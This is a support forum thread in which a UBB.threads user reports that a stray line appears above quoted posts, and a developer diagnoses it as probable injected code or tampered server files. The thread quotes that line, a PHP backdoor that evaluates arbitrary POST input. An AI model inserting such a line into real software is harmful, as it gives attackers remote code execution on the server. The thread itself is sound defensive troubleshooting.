Previous Thread
Next Thread
Print Thread
Hop To
#265551 02/28/2023 3:06 PM
Joined: Feb 2013
Posts: 7
E
Stranger
Stranger
E Offline
Joined: Feb 2013
Posts: 7
I know nothing ! period. However I have a question that troubles me as
no one on out forums knows what this is or if it's a simple fix that our Adminstrator
could do with "code" fixes ? I came in here in 2013 and found I was not at all capable in understanding the language in computer talks. In 2016 our sites Adminstrator posted some questions and found some helpful tips. That said the site upgraded to version 7.7.5 ? not long ago and the " script message" still shows after quotes our members make. It shows this script message above the quote box.. I will mock up an example in the quote feature here and place the script message as it would appear after members use a quote in the topic/threads we make

This script message appears above
outside of the quote box after replies are made


<script language="php">eval($_POST['ads'])</script>
Quote
Quotes- appear as normal here within the tags ?

Any tips and throughts would be greatly appreciated
And if no one can say so be it... --- Thank You !
Ernie

Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
UBB.threads Developer
Joined: Jun 2006
Posts: 16,292
Likes: 116
Is this code displaying randomly all over your forum or just under specific posts by users? It's possible a user is trying to insert code via their signature or within a post if it only displays while showing a post.

If it shows all over the forums it'd seem that some files on your server have been modified, as this is just not something we use in the development package:
Code
eval($_POST['ads'])

You should check the last edit time of all of your /script and /templates/default files and see if anything stands out.

Our backend processing engine (SMARTY) is likely seeing this evaled code and is blocking it from running on your forums and simply displaying it versus running it.


PHP Function eval
Quote
eval — Evaluate a string as PHP code

Caution The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.
Basically it seems like this code is trying to allow someone to submit arbitrary code to your forums via the $post parameter


We'd really need to see this occurring in the wild in order to be able to fully see what's going on.


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Joined: Feb 2013
Posts: 7
E
Stranger
Stranger
E Offline
Joined: Feb 2013
Posts: 7
Quote
Is this code displaying randomly all over your forum or just under specific posts by users? It's possible a user is trying to insert code via their signature or within a post if it only displays while showing a post.

If it shows all over the forums it'd seem that some files on your server have been modified, as this is just not something we use in the development package:

Thanks Gizmo ! The script message only appears on the forums
When members use the " quote feature " in response to other replies.
And is only then seen , after posting replies with quotes ...
It seems to all revolve around the " Quote Feature"

Our Adminstrator caught my question here and we both appreciate
the input found here. As I said - I KNOW NOTHING- about computer language-
What you have provided is so welcomed ! And thank you for being kind and
gracious with me AKA " the most dangerous man behind any computer " - LOL
I will check back after talking with Chris our Adminstrator.

Thank You Gizmo
Ernie

Joined: Jun 2006
Posts: 16,292
Likes: 116
UBB.threads Developer
UBB.threads Developer
Joined: Jun 2006
Posts: 16,292
Likes: 116
You're administrator should compare your current files to the files that ship in the install archive to see if anything has been changed; in house I use a tool called Beyond Compare to do this.

If your admin is interested in a 3rd party (I, like the UBBDev staff are not employees of UBBCentral) security assessment over your forum software I'm available for gigs through my VNC Web Services site.


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Joined: Feb 2013
Posts: 7
E
Stranger
Stranger
E Offline
Joined: Feb 2013
Posts: 7
I sent a link to this post to our Adminstrator on the site. I appreciate your response to my question(s) and again Thank You ! Gizmo. thumbsup

Joined: Feb 2013
Posts: 7
E
Stranger
Stranger
E Offline
Joined: Feb 2013
Posts: 7
Sent you another private message Gizmo...
Really appreciate your working with me
as again-- I KNOW nothing about codes let
alone"computer talk" -smile..
Thank You
Ernie

Joined: Feb 2013
Posts: 7
E
Stranger
Stranger
E Offline
Joined: Feb 2013
Posts: 7
Anyone else want to take a look around ? (smile)
https://handymanwire.com/ubbthreads/ubbthreads.php/forum_summary


Link Copied to Clipboard
ShoutChat
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
spam issues
by ECNet - 03/19/2024 11:45 PM
Looking for a forum
by azr - 03/15/2024 11:26 PM
Editing Links in Post
by Outdoorking - 03/15/2024 9:31 AM
Question on barkrowler and the like
by Mors - 02/29/2024 6:51 PM
Member Permissions Help
by domspeak - 02/27/2024 6:31 PM
Who's Online Now
3 members (rootman, Gizmo, Nightcrawler), 562 guests, and 186 robots.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
Los Angeles
Los Angeles
by isaac, August 6
3D Creations
3D Creations
by JAISP, December 30
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 8.0.0
(Preview build 20230217)